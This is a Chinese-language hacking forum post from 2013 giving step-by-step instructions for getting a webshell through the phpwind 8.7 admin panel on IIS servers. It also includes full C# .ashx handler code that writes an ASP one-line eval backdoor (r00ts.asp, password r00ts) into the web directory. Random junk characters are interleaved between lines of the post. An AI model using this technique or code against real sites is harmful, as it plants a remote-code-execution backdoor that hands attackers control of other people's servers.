中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
+ W7 r9 y$ A5 V. c5 T
' ]/ C6 t& H3 p7 Y9 N
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
" i( N: t5 D% D2 X: W! ?* R
. i* _, x8 O1 o( P" Q5 ^& F
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
7 h; A' J/ Q* I4 _- r9 m' S
! C" d8 O! j- p% f3 N, B, B4 [: C
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
. ^; N( N$ K( ^: L! V. c- ]
. R3 G: v0 `* h! u( {# r
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
; L1 u3 u5 S; F. Z+ p5 T
5 [6 |+ ^+ d" R2 |4 G1 L
下面是代码:
+ O9 y. T$ b1 \
( q3 _7 d8 i: @) V" d
<%@ WebHandler Language="C#"Class="Handler" %>
: v9 \* h7 x- f* @4 a# G9 u/ p
using System;
* }* B/ ]" R* c# u$ M2 j
using System.Web;
9 _ g3 a7 A) ^
using System.IO;
; G' K- j0 [8 z: e) F2 F+ n, x
public class Handler : IHttpHandler {
( q# r9 \+ X, f1 G' v9 g: p
public void ProcessRequest (HttpContext context) {
' q6 L- }, p( L& h4 E- K& h
context.Response.ContentType = "text/plain";
2 p, S5 y% j: g) g
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
+ _2 z6 t& q% b* n1 L
file1.Write("<%eval request(\"r00ts\")%>");
# m# ]1 L- p0 V5 T4 w! T
file1.Flush();
. B& P: L6 j7 {" @& [/ V% H \
file1.Close();
2 w0 |7 j0 `! d' K( s" l% Q
}
! O0 K, v* k/ {
public bool IsReusable {
& l9 \4 b, o; h) f" W! z
get {
. F/ P" ^* J+ F& d) C M& T: G
return false;
1 B: `" V. l1 p8 [, G: C5 S
}
! n# s* g, i) X( ?* O+ k! I
}
) ]7 T/ C B) B& P1 ~* s- G) D
}
* C/ R' P, w% {6 U" U$ K; A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2